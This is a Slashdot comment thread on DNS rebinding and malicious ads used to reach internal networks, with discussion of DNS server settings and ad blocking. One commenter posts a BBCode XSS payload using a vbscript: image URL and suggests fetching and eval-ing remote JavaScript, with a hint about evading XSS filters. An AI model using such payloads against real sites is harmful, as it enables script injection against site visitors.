If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.

And considering that I've already (after reading the article mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, its ever less useful.
Cool! What server do you use, and how did you configure it to do this?

Re:There are far easier ways to exploit people (1)

KiloByte (825081) | more than 7 years ago | (#20139237)

If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.
That's a yet another reason to block known advertisers, with AdBlock personally or company-wide with stuff like dnscruft.

Re:There are far easier ways to exploit people (1)

Tony Hoyle (11698) | more than 7 years ago | (#20139789)

Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

Re:There are far easier ways to exploit people (1)

Morty (32057) | more than 7 years ago | (#20140099)

Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

That's not the problem. The problem is requests from internal addresses for external names that resolve to internal addresses. How do you block *that*?

Re:There are far easier ways to exploit people (1)

DrSkwid (118965) | more than 7 years ago | (#20140101)

Not if you use an XSS vulnerability. I already know 1 popular site I could use.
HINT: XSS filters sometimes don't check for just the javascript: version.

I think https would sort most of this problem out. Cheap certs really are a must !

Re:There are far easier ways to exploit people (1)

DrSkwid (118965) | more than 7 years ago | (#20140157)

bah slashcode ate my comment, I'll do it in BBCode seeing as that's usually the place to exploit it

[img]vbscript:msgbox("xss js 0wns j00")[/img]

use the vbscript of your choice, I'd pop an XMLHttpRequest out, eval the returned javascript and off you go

We need this, now! (1)

dkf (304284) | more than 7 years ago | (#20139563)

... so that we can redirect links to the paper explaining all to a server that isn't slashdotted...

Multi-pin? (1)

Ortega-Starfire (930563) | more than 7 years ago | (#20141253)

Multi-Pass!

(Sorry, it was the first thing that came to mind.)
Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?